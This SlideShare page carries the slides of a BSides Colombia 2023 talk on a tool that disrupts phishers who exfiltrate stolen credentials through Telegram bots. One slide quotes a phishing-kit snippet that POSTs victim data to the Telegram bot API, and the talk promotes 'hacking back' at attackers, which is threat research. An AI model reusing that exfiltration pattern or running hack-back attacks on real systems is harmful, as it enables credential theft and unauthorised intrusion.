SlideShare uma empresa Scribd logo

Introducing Telegram-hitbackscammer | BSides Colombia 2023

J
Jaime Andrés Bello Vieda

Talk provided in the BSides Colombia 2023 - April 2023 Video: https://www.youtube.com/watch?v=YTz1yQGyFLw Project: https://github.com/avechuch0/telegram-hitbackscammer

Software
1 de 13
Baixar para ler offline
Introducing Telegram-hitbackscammer A practical approach to fight and hack-back threat actors who use Telegram bots as exfiltration
03 Final product of this research as response to mitigate these issues Title Here Contents 01 The use of Telegram as part of the current threat landscape 02 How this research started
About me Just a guy with the goal of overcoming himself Threat Intel, Digital Forensics, Malware Analysis, CloudSec, Pentesting… These little things… GCFA, GCPN, CISM, CSX, PMP, IA-ISO27001 University Teacher – Researcher – Speaker Lover of nature, Musician IBMer, X-Force Incident Response ”
Phishing dear phishing…
So, what the fuss?
1. Weaponization 2. Delivery 3. Impact and monetization POST REQUEST … var settings = { "async": true, "crossDomain": true, "url": "https://api.telegram.org/bot" + telegram_bot_id + "/sendMessage", "method": "POST", … Attacker gets a Telegram bot using the Botfather for malicious purposes Victims fill data managed by malicious bot Credentials stolen for money transfer/ withdraw Phishing/Smishing So, what the fuss?
Researching and thinking Finally H3llo w0rld! What can I do to f*ck up these dudes? Logo hmm Hmm… Logo … Oh yes! Let’s code
A set of protocols to screw up the malicious activities of phishers who store the victim's stolen data on Telegram chats/channels ” Attribution Annoyance Attack So, what is Telegram-hitbackscammer
Cybersec theories behind Telegram-hitbackscammer Triple A of Active Defense Researchers Threat hunters Incident Responders Developers Attribution: Trying to unmask the attackers Annoyance: Wasting an attacker’s time Attack: It is hacking …back using pentest tricks
D.E.M.O ? Is there a Demo… Nope is not? https://github.com/avechuch0/telegram-hitbackscammer Of course, it is just kidding ☺
Closing thoughts Charity / Crowdfunding / Sponsorship The Telegram malicious current ecosystem is very huge to process! ”
Closing thoughts Be sure to hack… for good ALWAYS Spread the word, take it, and use it https://github.com/avechuch0/telegram-hitbackscammer QUESTIONS? @avechuch0 ” Jaime Andrés Bello Vieda
Thanks For Watching www. bsidesco. org April 2023 Colombia

Recomendados

Internet Banking Attacks (Karel Miko)
Internet Banking Attacks (Karel Miko)Internet Banking Attacks (Karel Miko)
Internet Banking Attacks (Karel Miko)DCIT, a.s.
 
IRJET- Security from Man-In-The-Middle-Attack
IRJET- Security from Man-In-The-Middle-AttackIRJET- Security from Man-In-The-Middle-Attack
IRJET- Security from Man-In-The-Middle-AttackIRJET Journal
 
[Bucharest] Attack is easy, let's talk defence
[Bucharest] Attack is easy, let's talk defence[Bucharest] Attack is easy, let's talk defence
[Bucharest] Attack is easy, let's talk defenceOWASP EEE
 
The Comprehensive Security Policy In The Trojan War
The Comprehensive Security Policy In The Trojan WarThe Comprehensive Security Policy In The Trojan War
The Comprehensive Security Policy In The Trojan WarMandy Cross
 
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...DefCamp
 
Web Security
Web SecurityWeb Security
Web SecurityBharath Manoharan
 
Mim Attack Essay
Mim Attack EssayMim Attack Essay
Mim Attack EssayHaley Johnson
 
Enhanced adaptive security system for SMS – based One Time Password
Enhanced adaptive security system for SMS – based One Time PasswordEnhanced adaptive security system for SMS – based One Time Password
Enhanced adaptive security system for SMS – based One Time PasswordChandrapriya Rediex
 

Recomendados

Internet Banking Attacks (Karel Miko)
Internet Banking Attacks (Karel Miko)Internet Banking Attacks (Karel Miko)
Internet Banking Attacks (Karel Miko)DCIT, a.s.
 
IRJET- Security from Man-In-The-Middle-Attack
IRJET- Security from Man-In-The-Middle-AttackIRJET- Security from Man-In-The-Middle-Attack
IRJET- Security from Man-In-The-Middle-AttackIRJET Journal
 
[Bucharest] Attack is easy, let's talk defence
[Bucharest] Attack is easy, let's talk defence[Bucharest] Attack is easy, let's talk defence
[Bucharest] Attack is easy, let's talk defenceOWASP EEE
 
The Comprehensive Security Policy In The Trojan War
The Comprehensive Security Policy In The Trojan WarThe Comprehensive Security Policy In The Trojan War
The Comprehensive Security Policy In The Trojan WarMandy Cross
 
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...DefCamp
 
Web Security
Web SecurityWeb Security
Web SecurityBharath Manoharan
 
Mim Attack Essay
Mim Attack EssayMim Attack Essay
Mim Attack EssayHaley Johnson
 
Enhanced adaptive security system for SMS – based One Time Password
Enhanced adaptive security system for SMS – based One Time PasswordEnhanced adaptive security system for SMS – based One Time Password
Enhanced adaptive security system for SMS – based One Time PasswordChandrapriya Rediex
 
miniproject.ppt.pptx
miniproject.ppt.pptxminiproject.ppt.pptx
miniproject.ppt.pptxAnush90
 
Modeling and Utilizing Security Knowledge for Eliciting Security Requirements
Modeling and Utilizing Security Knowledge for Eliciting Security RequirementsModeling and Utilizing Security Knowledge for Eliciting Security Requirements
Modeling and Utilizing Security Knowledge for Eliciting Security RequirementsShinpei Hayashi
 
Machine learning techniques in fraud prevention
Machine learning techniques in fraud preventionMachine learning techniques in fraud prevention
Machine learning techniques in fraud preventionVolodymyr Syzonenko
 
Isn't it all just SMS-sending trojans?: Real Advances in Android Malware
Isn't it all just SMS-sending trojans?: Real Advances in Android MalwareIsn't it all just SMS-sending trojans?: Real Advances in Android Malware
Isn't it all just SMS-sending trojans?: Real Advances in Android MalwareJimmy Shah
 
Threat report h1_2013
Threat report h1_2013Threat report h1_2013
Threat report h1_2013Комсс Файквэе
 
Your Money or Your Data: Ransomware, Cyber Security and Today’s Threat Landsc...
Your Money or Your Data: Ransomware, Cyber Security and Today’s Threat Landsc...Your Money or Your Data: Ransomware, Cyber Security and Today’s Threat Landsc...
Your Money or Your Data: Ransomware, Cyber Security and Today’s Threat Landsc...Roger Hagedorn
 
Ransomware_PDF
Ransomware_PDFRansomware_PDF
Ransomware_PDFRen Hao
 
Netpluz Managed SOC - MSS Service
Netpluz Managed SOC - MSS Service Netpluz Managed SOC - MSS Service
Netpluz Managed SOC - MSS Service Netpluz Asia Pte Ltd
 
Email: still the favourite route of attack
Email: still the favourite route of attackEmail: still the favourite route of attack
Email: still the favourite route of attackClaranet UK
 
Nuevas Tendencias de Negocios Virtuales en la Banca y sus Amenazas
Nuevas Tendencias de Negocios Virtuales en la Banca y sus AmenazasNuevas Tendencias de Negocios Virtuales en la Banca y sus Amenazas
Nuevas Tendencias de Negocios Virtuales en la Banca y sus AmenazasJaime Andrés Bello Vieda
 
Seguridad y auditoría de Apps o aplicaciones móviles
Seguridad y auditoría de Apps o aplicaciones móvilesSeguridad y auditoría de Apps o aplicaciones móviles
Seguridad y auditoría de Apps o aplicaciones móvilesJaime Andrés Bello Vieda
 
Una mirada a la Active Defense Harbinger Distribution como herramienta de mon...
Una mirada a la Active Defense Harbinger Distribution como herramienta de mon...Una mirada a la Active Defense Harbinger Distribution como herramienta de mon...
Una mirada a la Active Defense Harbinger Distribution como herramienta de mon...Jaime Andrés Bello Vieda
 
ISO 27001 cambios 2005 a 2013
ISO 27001 cambios 2005 a 2013ISO 27001 cambios 2005 a 2013
ISO 27001 cambios 2005 a 2013Jaime Andrés Bello Vieda
 
Primera reunión Capitulo OWASP Bogota - Golismero
Primera reunión Capitulo OWASP Bogota - GolismeroPrimera reunión Capitulo OWASP Bogota - Golismero
Primera reunión Capitulo OWASP Bogota - GolismeroJaime Andrés Bello Vieda
 
Entendiendo el ransomware
Entendiendo el ransomwareEntendiendo el ransomware
Entendiendo el ransomwareJaime Andrés Bello Vieda
 
Construyendo tu propio laboratorio de pentesting
Construyendo tu propio laboratorio de pentestingConstruyendo tu propio laboratorio de pentesting
Construyendo tu propio laboratorio de pentestingJaime Andrés Bello Vieda
 
Introducción a la Gerencia de Proyectos del PMI
Introducción a la Gerencia de Proyectos del PMIIntroducción a la Gerencia de Proyectos del PMI
Introducción a la Gerencia de Proyectos del PMIJaime Andrés Bello Vieda
 
Professional Resume Template for Software Developers
Professional Resume Template for Software DevelopersProfessional Resume Template for Software Developers
Professional Resume Template for Software DevelopersVinodh Ram
 
Cloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStackCloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStackVICTOR MAESTRE RAMIREZ
 
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...MyIntelliSource, Inc.
 
Building Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop SlideBuilding Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop SlideChristina Lin
 
Unit 1.1 Excite Part 1, class 9, cbse...
Unit 1.1 Excite Part 1, class 9, cbse...Unit 1.1 Excite Part 1, class 9, cbse...
Unit 1.1 Excite Part 1, class 9, cbse...aditisharan08
 

Mais conteúdo relacionado

Semelhante a Introducing Telegram-hitbackscammer | BSides Colombia 2023

miniproject.ppt.pptx
miniproject.ppt.pptxminiproject.ppt.pptx
miniproject.ppt.pptxAnush90
 
Modeling and Utilizing Security Knowledge for Eliciting Security Requirements
Modeling and Utilizing Security Knowledge for Eliciting Security RequirementsModeling and Utilizing Security Knowledge for Eliciting Security Requirements
Modeling and Utilizing Security Knowledge for Eliciting Security RequirementsShinpei Hayashi
 
Machine learning techniques in fraud prevention
Machine learning techniques in fraud preventionMachine learning techniques in fraud prevention
Machine learning techniques in fraud preventionVolodymyr Syzonenko
 
Isn't it all just SMS-sending trojans?: Real Advances in Android Malware
Isn't it all just SMS-sending trojans?: Real Advances in Android MalwareIsn't it all just SMS-sending trojans?: Real Advances in Android Malware
Isn't it all just SMS-sending trojans?: Real Advances in Android MalwareJimmy Shah
 
Your Money or Your Data: Ransomware, Cyber Security and Today’s Threat Landsc...
Your Money or Your Data: Ransomware, Cyber Security and Today’s Threat Landsc...Your Money or Your Data: Ransomware, Cyber Security and Today’s Threat Landsc...
Your Money or Your Data: Ransomware, Cyber Security and Today’s Threat Landsc...Roger Hagedorn
 
Ransomware_PDF
Ransomware_PDFRansomware_PDF
Ransomware_PDFRen Hao
 
Netpluz Managed SOC - MSS Service
Netpluz Managed SOC - MSS Service Netpluz Managed SOC - MSS Service
Netpluz Managed SOC - MSS Service Netpluz Asia Pte Ltd
 
Email: still the favourite route of attack
Email: still the favourite route of attackEmail: still the favourite route of attack
Email: still the favourite route of attackClaranet UK
 

Semelhante a Introducing Telegram-hitbackscammer | BSides Colombia 2023 (9)

miniproject.ppt.pptx
miniproject.ppt.pptxminiproject.ppt.pptx
miniproject.ppt.pptx
 
Modeling and Utilizing Security Knowledge for Eliciting Security Requirements
Modeling and Utilizing Security Knowledge for Eliciting Security RequirementsModeling and Utilizing Security Knowledge for Eliciting Security Requirements
Modeling and Utilizing Security Knowledge for Eliciting Security Requirements
 
Machine learning techniques in fraud prevention
Machine learning techniques in fraud preventionMachine learning techniques in fraud prevention
Machine learning techniques in fraud prevention
 
Isn't it all just SMS-sending trojans?: Real Advances in Android Malware
Isn't it all just SMS-sending trojans?: Real Advances in Android MalwareIsn't it all just SMS-sending trojans?: Real Advances in Android Malware
Isn't it all just SMS-sending trojans?: Real Advances in Android Malware
 
Threat report h1_2013
Threat report h1_2013Threat report h1_2013
Threat report h1_2013
 
Your Money or Your Data: Ransomware, Cyber Security and Today’s Threat Landsc...
Your Money or Your Data: Ransomware, Cyber Security and Today’s Threat Landsc...Your Money or Your Data: Ransomware, Cyber Security and Today’s Threat Landsc...
Your Money or Your Data: Ransomware, Cyber Security and Today’s Threat Landsc...
 
Ransomware_PDF
Ransomware_PDFRansomware_PDF
Ransomware_PDF
 
Netpluz Managed SOC - MSS Service
Netpluz Managed SOC - MSS Service Netpluz Managed SOC - MSS Service
Netpluz Managed SOC - MSS Service
 
Email: still the favourite route of attack
Email: still the favourite route of attackEmail: still the favourite route of attack
Email: still the favourite route of attack
 

Mais de Jaime Andrés Bello Vieda

Nuevas Tendencias de Negocios Virtuales en la Banca y sus Amenazas
Nuevas Tendencias de Negocios Virtuales en la Banca y sus AmenazasNuevas Tendencias de Negocios Virtuales en la Banca y sus Amenazas
Nuevas Tendencias de Negocios Virtuales en la Banca y sus AmenazasJaime Andrés Bello Vieda
 
Seguridad y auditoría de Apps o aplicaciones móviles
Seguridad y auditoría de Apps o aplicaciones móvilesSeguridad y auditoría de Apps o aplicaciones móviles
Seguridad y auditoría de Apps o aplicaciones móvilesJaime Andrés Bello Vieda
 
Una mirada a la Active Defense Harbinger Distribution como herramienta de mon...
Una mirada a la Active Defense Harbinger Distribution como herramienta de mon...Una mirada a la Active Defense Harbinger Distribution como herramienta de mon...
Una mirada a la Active Defense Harbinger Distribution como herramienta de mon...Jaime Andrés Bello Vieda
 
Primera reunión Capitulo OWASP Bogota - Golismero
Primera reunión Capitulo OWASP Bogota - GolismeroPrimera reunión Capitulo OWASP Bogota - Golismero
Primera reunión Capitulo OWASP Bogota - GolismeroJaime Andrés Bello Vieda
 
Construyendo tu propio laboratorio de pentesting
Construyendo tu propio laboratorio de pentestingConstruyendo tu propio laboratorio de pentesting
Construyendo tu propio laboratorio de pentestingJaime Andrés Bello Vieda
 
Introducción a la Gerencia de Proyectos del PMI
Introducción a la Gerencia de Proyectos del PMIIntroducción a la Gerencia de Proyectos del PMI
Introducción a la Gerencia de Proyectos del PMIJaime Andrés Bello Vieda
 

Mais de Jaime Andrés Bello Vieda (8)

Nuevas Tendencias de Negocios Virtuales en la Banca y sus Amenazas
Nuevas Tendencias de Negocios Virtuales en la Banca y sus AmenazasNuevas Tendencias de Negocios Virtuales en la Banca y sus Amenazas
Nuevas Tendencias de Negocios Virtuales en la Banca y sus Amenazas
 
Seguridad y auditoría de Apps o aplicaciones móviles
Seguridad y auditoría de Apps o aplicaciones móvilesSeguridad y auditoría de Apps o aplicaciones móviles
Seguridad y auditoría de Apps o aplicaciones móviles
 
Una mirada a la Active Defense Harbinger Distribution como herramienta de mon...
Una mirada a la Active Defense Harbinger Distribution como herramienta de mon...Una mirada a la Active Defense Harbinger Distribution como herramienta de mon...
Una mirada a la Active Defense Harbinger Distribution como herramienta de mon...
 
ISO 27001 cambios 2005 a 2013
ISO 27001 cambios 2005 a 2013ISO 27001 cambios 2005 a 2013
ISO 27001 cambios 2005 a 2013
 
Primera reunión Capitulo OWASP Bogota - Golismero
Primera reunión Capitulo OWASP Bogota - GolismeroPrimera reunión Capitulo OWASP Bogota - Golismero
Primera reunión Capitulo OWASP Bogota - Golismero
 
Entendiendo el ransomware
Entendiendo el ransomwareEntendiendo el ransomware
Entendiendo el ransomware
 
Construyendo tu propio laboratorio de pentesting
Construyendo tu propio laboratorio de pentestingConstruyendo tu propio laboratorio de pentesting
Construyendo tu propio laboratorio de pentesting
 
Introducción a la Gerencia de Proyectos del PMI
Introducción a la Gerencia de Proyectos del PMIIntroducción a la Gerencia de Proyectos del PMI
Introducción a la Gerencia de Proyectos del PMI
 

Último

Professional Resume Template for Software Developers
Professional Resume Template for Software DevelopersProfessional Resume Template for Software Developers
Professional Resume Template for Software DevelopersVinodh Ram
 
Cloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStackCloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStackVICTOR MAESTRE RAMIREZ
 
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...MyIntelliSource, Inc.
 
Building Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop SlideBuilding Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop SlideChristina Lin
 
Unit 1.1 Excite Part 1, class 9, cbse...
Unit 1.1 Excite Part 1, class 9, cbse...Unit 1.1 Excite Part 1, class 9, cbse...
Unit 1.1 Excite Part 1, class 9, cbse...aditisharan08
 
TECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providerTECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providermohitmore19
 
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfLearn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfkalichargn70th171
 
Asset Management Software - Infographic
Asset Management Software - InfographicAsset Management Software - Infographic
Asset Management Software - InfographicHr365.us smith
 
EY_Graph Database Powered Sustainability
EY_Graph Database Powered SustainabilityEY_Graph Database Powered Sustainability
EY_Graph Database Powered SustainabilityNeo4j
 
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...gurkirankumar98700
 
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...kellynguyen01
 
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASEBATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASEOrtus Solutions, Corp
 
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdfThe Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdfkalichargn70th171
 
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...soniya singh
 
Optimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVOptimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVshikhaohhpro
 
Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)OPEN KNOWLEDGE GmbH
 
5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdfWave PLM
 
A Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxA Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxComplianceQuest1
 
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...stazi3110
 

Último (20)

Professional Resume Template for Software Developers
Professional Resume Template for Software DevelopersProfessional Resume Template for Software Developers
Professional Resume Template for Software Developers
 
Cloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStackCloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStack
 
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
 
Building Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop SlideBuilding Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
 
Unit 1.1 Excite Part 1, class 9, cbse...
Unit 1.1 Excite Part 1, class 9, cbse...Unit 1.1 Excite Part 1, class 9, cbse...
Unit 1.1 Excite Part 1, class 9, cbse...
 
Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...
Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...
Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...
 
TECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providerTECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service provider
 
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfLearn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
 
Asset Management Software - Infographic
Asset Management Software - InfographicAsset Management Software - Infographic
Asset Management Software - Infographic
 
EY_Graph Database Powered Sustainability
EY_Graph Database Powered SustainabilityEY_Graph Database Powered Sustainability
EY_Graph Database Powered Sustainability
 
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
 
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
 
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASEBATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
 
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdfThe Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
 
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
 
Optimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVOptimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTV
 
Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)
 
5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf
 
A Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxA Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docx
 
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
 

Introducing Telegram-hitbackscammer | BSides Colombia 2023

  • 1. Introducing Telegram-hitbackscammer A practical approach to fight and hack-back threat actors who use Telegram bots as exfiltration
  • 2. 03 Final product of this research as response to mitigate these issues Title Here Contents 01 The use of Telegram as part of the current threat landscape 02 How this research started
  • 3. About me Just a guy with the goal of overcoming himself Threat Intel, Digital Forensics, Malware Analysis, CloudSec, Pentesting… These little things… GCFA, GCPN, CISM, CSX, PMP, IA-ISO27001 University Teacher – Researcher – Speaker Lover of nature, Musician IBMer, X-Force Incident Response ”
  • 5. So, what the fuss?
  • 6. 1. Weaponization 2. Delivery 3. Impact and monetization POST REQUEST … var settings = { "async": true, "crossDomain": true, "url": "https://api.telegram.org/bot" + telegram_bot_id + "/sendMessage", "method": "POST", … Attacker gets a Telegram bot using the Botfather for malicious purposes Victims fill data managed by malicious bot Credentials stolen for money transfer/ withdraw Phishing/Smishing So, what the fuss?
  • 7. Researching and thinking Finally H3llo w0rld! What can I do to f*ck up these dudes? Logo hmm Hmm… Logo … Oh yes! Let’s code
  • 8. A set of protocols to screw up the malicious activities of phishers who store the victim's stolen data on Telegram chats/channels ” Attribution Annoyance Attack So, what is Telegram-hitbackscammer
  • 9. Cybersec theories behind Telegram-hitbackscammer Triple A of Active Defense Researchers Threat hunters Incident Responders Developers Attribution: Trying to unmask the attackers Annoyance: Wasting an attacker’s time Attack: It is hacking …back using pentest tricks
  • 10. D.E.M.O ? Is there a Demo… Nope is not? https://github.com/avechuch0/telegram-hitbackscammer Of course, it is just kidding ☺
  • 11. Closing thoughts Charity / Crowdfunding / Sponsorship The Telegram malicious current ecosystem is very huge to process! ”
  • 12. Closing thoughts Be sure to hack… for good ALWAYS Spread the word, take it, and use it https://github.com/avechuch0/telegram-hitbackscammer QUESTIONS? @avechuch0 ” Jaime Andrés Bello Vieda
  • 13. Thanks For Watching www. bsidesco. org April 2023 Colombia